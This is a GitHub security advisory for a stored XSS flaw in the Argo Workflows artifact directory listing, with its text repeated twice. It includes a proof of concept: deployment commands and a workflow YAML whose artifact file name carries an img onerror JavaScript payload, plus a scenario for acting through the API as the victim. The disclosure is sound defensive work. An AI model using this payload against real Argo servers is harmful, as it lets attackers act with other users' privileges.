Headline
GHSA-cv78-6m8q-ph82: Argo Workflows affected by stored XSS in the artifact directory listing
Summary
Stored XSS in the artifact directory listing allows any workflow author to execute arbitrary JavaScript in another user’s browser under the Argo Server origin, enabling API actions with the victim’s privileges.
Details
The directory listing response in server/artifacts/artifact_server.go renders object names directly into HTML via fmt.Fprintf without escaping. Object names come from driver.ListObjects(...) and are attacker‑controlled when a workflow writes files into an output artifact directory.
https://github.com/argoproj/argo-workflows/blob/9872c296d29dcc5e9c78493054961ede9fc30797/server/artifacts/artifact_server.go#L194-L244
PoC
- Deploy Argo Workflows:
kubectl create ns argo
kubectl apply --server-side -f manifests/base/crds/full
kubectl apply --server-side -k manifests/quick-start/postgres
- Port‑forward Argo Server:
kubectl -n argo port-forward deploy/argo-server 2746:2746
- Create the PoC workflow:
cat > /tmp/argo-xss.yaml <<'EOF'
apiVersion: argoproj.io/v1alpha1
kind: Workflow
metadata:
generateName: xss-artifact-test-
spec:
entrypoint: main
templates:
- name: main
container:
image: alpine
command: [sh, -c]
args:
- |
mkdir -p /tmp/artifacts
touch '/tmp/artifacts/xss"><img src=x onerror="alert(document.domain)">.html'
outputs:
artifacts:
- name: dir
path: /tmp/artifacts
archive:
none: {}
EOF
kubectl -n argo create -f /tmp/argo-xss.yaml
- Wait for completion:
kubectl -n argo get wf -w
- Get the node ID:
kubectl -n argo get wf <wf-name> \
-o jsonpath='{range .status.nodes.*}{.id}{"\t"}{.displayName}{"\n"}{end}'
- Open the listing:
https://localhost:2746/artifact-files/argo/workflows/<wf-name>/<node-id>/outputs/dir/
<img width="1220" height="349" alt="image" src="https://github.com/user-attachments/assets/9d859826-c7cd-403b-988e-74695552944b" />
Impact
- The attacker creates a workflow that produces a HTML artifact that contains a HTML file that contains a script which uses XHR calls to interact with the Argo Server API.
- The attacker emails the deep-link to the artifact to their victim. The victim opens the link, the script starts running.
As the script has access to the Argo Server API (as the victim), so may do the following (if the victim may):
- Read information about the victim’s workflows.
- Create or delete workflows.
- GitHub Advisory Database
- GitHub Reviewed
- CVE-2026-23960
Argo Workflows affected by stored XSS in the artifact directory listing
High severity GitHub Reviewed Published Jan 21, 2026 in argoproj/argo-workflows • Updated Jan 21, 2026
Package
gomod github.com/argoproj/argo-workflows (Go)
Affected versions
<= 2.5.3-rc4
gomod github.com/argoproj/argo-workflows/v3 (Go)
< 3.6.17
>= 3.7.0, <= 3.7.7
Summary
Stored XSS in the artifact directory listing allows any workflow author to execute arbitrary JavaScript in another user’s browser under the Argo Server origin, enabling API actions with the victim’s privileges.
Details
The directory listing response in server/artifacts/artifact_server.go renders object names directly into HTML via fmt.Fprintf without escaping. Object names come from driver.ListObjects(…) and are attacker‑controlled when a workflow writes files into an output artifact directory.
https://github.com/argoproj/argo-workflows/blob/9872c296d29dcc5e9c78493054961ede9fc30797/server/artifacts/artifact_server.go#L194-L244
PoC
Deploy Argo Workflows:
kubectl create ns argo kubectl apply --server-side -f manifests/base/crds/full kubectl apply --server-side -k manifests/quick-start/postgres
Port‑forward Argo Server:
kubectl -n argo port-forward deploy/argo-server 2746:2746
- Create the PoC workflow:
cat > /tmp/argo-xss.yaml <<’EOF’ apiVersion: argoproj.io/v1alpha1 kind: Workflow metadata: generateName: xss-artifact-test- spec: entrypoint: main templates:
name: main container: image: alpine command: [sh, -c] args:
- | mkdir -p /tmp/artifacts touch ‘/tmp/artifacts/xss"><img src=x onerror="alert(document.domain)">.html’ outputs: artifacts:
- name: dir path: /tmp/artifacts archive: none: {} EOF
kubectl -n argo create -f /tmp/argo-xss.yaml
Wait for completion:
kubectl -n argo get wf -w
Get the node ID:
kubectl -n argo get wf <wf-name>
-o jsonpath=’{range .status.nodes.*}{.id}{"\t"}{.displayName}{"\n"}{end}’
- Open the listing:
https://localhost:2746/artifact-files/argo/workflows/<wf-name>/<node-id>/outputs/dir/
Impact
- The attacker creates a workflow that produces a HTML artifact that contains a HTML file that contains a script which uses XHR calls to interact with the Argo Server API.
- The attacker emails the deep-link to the artifact to their victim. The victim opens the link, the script starts running.
As the script has access to the Argo Server API (as the victim), so may do the following (if the victim may):
- Read information about the victim’s workflows.
- Create or delete workflows.
References
- GHSA-cv78-6m8q-ph82
- argoproj/argo-workflows@159a5c5
- https://github.com/argoproj/argo-workflows/blob/9872c296d29dcc5e9c78493054961ede9fc30797/server/artifacts/artifact_server.go#L194-L244
- https://github.com/argoproj/argo-workflows/releases/tag/v3.6.17
- https://github.com/argoproj/argo-workflows/releases/tag/v3.7.8
Published to the GitHub Advisory Database
Jan 21, 2026
Last updated
Jan 21, 2026